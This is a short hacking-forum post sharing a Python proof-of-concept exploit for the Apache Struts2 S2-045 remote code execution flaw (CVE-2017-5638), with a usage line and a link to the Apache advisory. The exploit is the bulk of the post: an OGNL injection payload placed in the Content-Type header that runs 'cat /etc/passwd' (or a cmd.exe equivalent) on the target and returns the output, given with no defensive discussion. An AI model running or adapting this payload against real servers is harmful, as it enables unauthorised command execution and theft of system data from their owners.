HackerTop - View topic - Apache Struts2 Remote Code Execution (S2-045,CVE-2017-5638)
View unanswered posts | View active topics It is currently Sun Aug 20, 2017 2:05 am



Reply to topic  [ 1 post ] 
 Apache Struts2 Remote Code Execution (S2-045,CVE-2017-5638) 
Author Message

Joined: Fri Aug 05, 2016 2:53 pm
Posts: 9
Reply with quote
poc

Code:
#!/usr/bin/env python
# coding:utf8

import urllib2
import sys

from poster.encode import multipart_encode
from poster.streaminghttp import register_openers

reload(sys)

sys.setdefaultencoding('utf-8')


def poc():
    register_openers()
    datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
    header[
        "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    header[
        "Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    request = urllib2.Request(str(sys.argv[1]), datagen, headers=header)
    response = urllib2.urlopen(request)
    print response.read()


poc()




python S2-045 URL


refer>>:https://cwiki.apache.org/confluence/display/WW/S2-045


Tue Mar 07, 2017 6:11 am
Profile
Display posts from previous:  Sort by  
Reply to topic   [ 1 post ] 

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron
Copyright © 2003-2016 HackerTop. All rights reserved.
Privacy & Cookies Policy
Community Forum Software by phpBB